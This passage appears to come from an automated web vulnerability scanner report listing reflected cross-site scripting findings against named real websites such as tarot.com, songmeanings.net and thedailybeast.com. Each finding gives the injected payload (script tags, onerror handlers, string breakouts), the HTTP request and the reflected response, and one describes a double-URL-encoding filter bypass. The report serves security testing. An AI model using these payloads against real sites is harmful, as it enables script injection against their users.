Set-Cookie: session=8bd0d740a1e3f55aa6029029f1babb60/1301751361/05455137116852e2aca9e684d063385b; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:36:31 GMT
Cache-Control: must-revalidate
Expires: Sat, 02 Apr 2011 13:36:02 GMT
Last-Modified: Sat, 02 Apr 2011 13:36:01 GMT
Set-Cookie: browser=1.210801301751361255; path=/; expires=Tue, 30-Mar-21 13:36:01 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.rent.com
Content-Length: 20031


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en" class="no-js">
<head>
<title>Error 404: Page Not Found</title>

<link href="http://media.rent.com/css/renter.css?v=8297
...[SNIP]...
<script type="text/javascript">
$().ready(function() {
next_url = '/favicon.icoee0cd';cb0a88443c6';
ajax_img = 'http://media.rent.com/img/global/ajax-loader-blue.gif';
signin_box_state = 'closed';

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>
...[SNIP]...
6.81. http://www.rent.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rent.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a25%2522%253e%253ca%2520b%253dc%253e1df3e30028f was submitted in the REST URL parameter 1. This input was echoed as f5a25"><a b=c>1df3e30028f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.icof5a25%2522%253e%253ca%2520b%253dc%253e1df3e30028f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rent.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:49 GMT
Server: Apache
Set-Cookie: session=10126565fabf461a6858b2961126cae8/1301751350/be94a764a1841ff093210115435aab78; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:36:20 GMT
Cache-Control: must-revalidate
Expires: Sat, 02 Apr 2011 13:35:51 GMT
Last-Modified: Sat, 02 Apr 2011 13:35:50 GMT
Set-Cookie: browser=1.2046613017513502; path=/; expires=Tue, 30-Mar-21 13:35:50 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.rent.com
Content-Length: 20069


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en" class="no-js">
<head>
<title>Error 404: Page Not Found</title>

<link href="http://media.rent.com/css/renter.css?v=8297
...[SNIP]...
<a id="topbar_signin_link_id" class="topbar_signin_link" href="/account/login/" linkname="GlobalHeader_SignIn_Link" rel="/favicon.icof5a25"><a b=c>1df3e30028f">
...[SNIP]...
6.82. http://www.reverbnation.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reverbnation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3eefb<img%20src%3da%20onerror%3dalert(1)>8088e5a0514 was submitted in the REST URL parameter 1. This input was echoed as 3eefb<img src=a onerror=alert(1)>8088e5a0514 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico3eefb<img%20src%3da%20onerror%3dalert(1)>8088e5a0514 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reverbnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:41:53 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n-fips Phusion_Passenger/3.0.4
X-Powered-By:
Cache-Control: no-cache
Set-Cookie: _session_id=bdfe329ab8b312ccf2f484a799176e11; domain=reverbnation.com; path=/; HttpOnly
Content-Length: 21673
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerCust15535_http_new=4032917968.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a href="/main/global_search?q=favicon.ico3eefb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8088e5a0514" rel="nofollow">Search for 'favicon.ico3eefb<img src=a onerror=alert(1)>8088e5a0514'</a>
...[SNIP]...
6.83. http://www.shangri-la.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shangri-la.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 682d8'%3b026f574dde7 was submitted in the REST URL parameter 1. This input was echoed as 682d8';026f574dde7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico682d8'%3b026f574dde7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shangri-la.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-WebServer-By: WEB02
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://www.shangri-la.com
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 15288
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Sat, 02 Apr 2011 13:45:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<script type="text/javascript">
   var share_page_data={};
   share_page_data.page_url = 'http://www.shangri-la.com/Error404.aspx?404;http://www.shangri-la.com:80/favicon.ico682d8';026f574dde7';
   share_page_data.page_name = "Page Not Found";
</script>
...[SNIP]...
6.84. http://www.shopcompanion.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ca3b<img%20src%3da%20onerror%3dalert(1)>4816534cea1 was submitted in the REST URL parameter 1. This input was echoed as 1ca3b<img src=a onerror=alert(1)>4816534cea1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /1ca3b<img%20src%3da%20onerror%3dalert(1)>4816534cea1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:01:14 GMT
Content-Type: text/html; charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR NID CURa OUR NOR PHY UNI DEM PRE"
Set-Cookie: AMOS_SID=_live_ticks%3D1301752873832%26live%3DOEzzw%252Eh~XWhkUXWWzxjwVzhxexzYwVqzjWYUkqWwwmXezhmzm; Path=/; Domain=.shopcompanion.com;
Set-Cookie: AMOS_NS_ID=048; Path=/; Domain=.shopcompanion.com;
Set-Cookie: CC_SRCID=369; Path=/; Domain=www.shopcompanion.com;
Set-Cookie: AMID=2232139994; Path=/; Domain=.shopcompanion.com; Expires=Tuesday, 01-Jan-38 00:00:01 GMT
Set-Cookie: CATALOGCITY_SSNLIVE111=2232139994; Path=/; Domain=.shopcompanion.com;
Set-Cookie: SHOPPER_LOCATION=Monterey%2C+CA%2C+93940%2C+36%2E600111%2C+-121%2E894521%2C+30; Path=/; Domain=www.shopcompanion.com;
Content-Length: 107216

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" t
...[SNIP]...
<span class="span tx_bold">> 1ca3b<img src=a onerror=alert(1)>4816534cea1</span>
...[SNIP]...
6.85. http://www.smarter.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.smarter.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c2201<a>26331e04736 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /c2201<a>26331e04736 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smarter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:23 GMT
Server: Apache
Loader-Time-Used: 0.00018
Set-Cookie: __mmsid=d9c2a77556a5d7bf53b16231f5cfac85; path=/; domain=.smarter.com
Set-Cookie: __mmspn=deleted; expires=Fri, 02-Apr-2010 13:33:22 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmoff=deleted; expires=Fri, 02-Apr-2010 13:33:22 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmuid=66a6612fe3ea8c94b39704425bd47fba; expires=Sat, 02-Apr-2016 13:33:23 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmtrk=-1|||3|4ecd93f7c006897fc2035eac37f86a5b|AwA%3D|0y9O1dUtLNRNNjIyMFQ1MjV2TgSRrkZmxsaGqQYm5sZmehkluTkA; path=/; domain=.smarter.com
Set-Cookie: qry_lnk=deleted; expires=Fri, 02-Apr-2010 13:33:23 GMT; path=/; domain=.smarter.com
Set-Cookie: qry_ctxt=deleted; expires=Fri, 02-Apr-2010 13:33:23 GMT; path=/; domain=.smarter.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 93179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> c2201<A>26331e04736
...[SNIP]...
<h2>How to Shop Smarter for c2201<a>26331e04736: </h2>
...[SNIP]...
6.86. http://www.soft82.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soft82.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99137<script>alert(1)</script>cb264ab5f87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico99137<script>alert(1)</script>cb264ab5f87 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.soft82.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:16:15 GMT
Server: Apache/1.3.42 (Unix) PHP/5.3.4 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=d833dc533a466d6bfc13ec777b9775ab; path=/; domain=.soft82.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 87349

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<BASE href="http://www.soft82.com/">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>
...[SNIP]...
<strong>www.soft82.com/favicon.ico99137<script>alert(1)</script>cb264ab5f87</strong>
...[SNIP]...
6.87. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7297a"-alert(1)-"4c63be965d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7297a"-alert(1)-"4c63be965d1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:14:05 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=8v774711o8lea5jaf5624ak142; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23886


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<script type="text/javascript">
// Note: it's important to keep these in separate script blocks
COMSCORE.beacon({
   c1: 2,
   c2: "6772046",
   c3: "",
   c4: "http://www.songmeanings.net/favicon.ico7297a"-alert(1)-"4c63be965d1", // Replace this with the page URL that the site is on here, and also enter it into the <noscript>
...[SNIP]...
6.88. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427ff"><script>alert(1)</script>13601e9ef95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico427ff"><script>alert(1)</script>13601e9ef95 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:13:57 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=c3e6n99ocvojajgu9q9r37uep5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.songmeanings.net/favicon.ico427ff"><script>alert(1)</script>13601e9ef95&c5=&c6=&c15=&cj=1" />
...[SNIP]...
6.89. http://www.spike.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spike.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78520"><script>alert(1)</script>dd39ddafe43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico78520"><script>alert(1)</script>dd39ddafe43 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spike.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:31:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:44 GMT; path=/
Vary: User-Agent
Content-Length: 33753


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="
...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/spike.com?url=/favicon.ico78520"><script>alert(1)</script>dd39ddafe43&pageType=&cmsPageId=&show=&title=&season=&photoTitle=&spikeTvShow=&channel=" type="text/javascript">
...[SNIP]...
6.90. http://www.supercheats.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supercheats.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0247"%3balert(1)//9ef130d939d was submitted in the REST URL parameter 1. This input was echoed as c0247";alert(1)//9ef130d939d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc0247"%3balert(1)//9ef130d939d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.supercheats.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:43:02 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script>

COMSCORE.beacon({

c1:2,

c2:"6035764",

c3:"",

c4:"http://www.supercheats.com/favicon.icoc0247";alert(1)//9ef130d939d",

c5:"",

c6:"",

c15:""

});

</script>
...[SNIP]...
6.91. http://www.tarot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3ca5'-alert(1)-'190ef52e03b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe3ca5'-alert(1)-'190ef52e03b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:10 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=rkucms4dupord0ov1fcq4vql54; expires=Sun, 01 Apr 2012 14:15:10 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=rkucms4dupord0ov1fcq4vql54; expires=Sat, 23-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcxMDtzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:10 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=rkucms4dupord0ov1fcq4vql54%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:10 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26394

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.icoe3ca5'-alert(1)-'190ef
...[SNIP]...

var random3 = Math.round( Math.random() * 5000230 );

       var URL = ''
           + '&sid=rkucms4dupord0ov1fcq4vql54'
           + '&uid='
           + '&pid=a-self-no'
           + '&site=tarot'
           + '&pg=/favicon.icoe3ca5'-alert(1)-'190ef52e03b'
           + '&pq='
           + '&rf='
           + '&ftr='
           + '&rq='
           + '&res=' + screen.width + 'x' + screen.height
           + '&col=' + c
           + '&brws=' + escape(navigator.appName)
           + '&brv=' + escape(navigator.appVersio
...[SNIP]...
6.92. http://www.tarot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2e1a2--><script>alert(1)</script>539e602d394 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2e1a2--><script>alert(1)</script>539e602d394 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:12 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=768ks8blt3b6jg5qpk26lbenk6; expires=Sun, 01 Apr 2012 14:15:12 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=768ks8blt3b6jg5qpk26lbenk6; expires=Sat, 23-Apr-2011 14:15:12 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcxMztzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:13 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=768ks8blt3b6jg5qpk26lbenk6%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:13 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26531

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.ico2e1a2--><script>alert(1)</script>539e602d394
copyright 1999-2011, Visionary Networks
10.3.1.24
#################################### -->
...[SNIP]...
6.93. http://www.tarot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6937"><script>alert(1)</script>27a4d5e9b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6937"><script>alert(1)</script>27a4d5e9b5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:06 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=rkh1871d7jsqqnuv8sjhgil1f0; expires=Sun, 01 Apr 2012 14:15:07 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=rkh1871d7jsqqnuv8sjhgil1f0; expires=Sat, 23-Apr-2011 14:15:07 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcwNztzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:07 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=rkh1871d7jsqqnuv8sjhgil1f0%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:07 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26518

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.icob6937"><script>alert(1
...[SNIP]...
<INPUT TYPE="hidden" NAME="returnUrl" VALUE="/favicon.icob6937"><script>alert(1)</script>27a4d5e9b5">
...[SNIP]...
6.94. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df34"><script>alert(1)</script>277514e1af2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4df34"><script>alert(1)</script>277514e1af2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailybeast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 02 Apr 2011 13:40:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60091

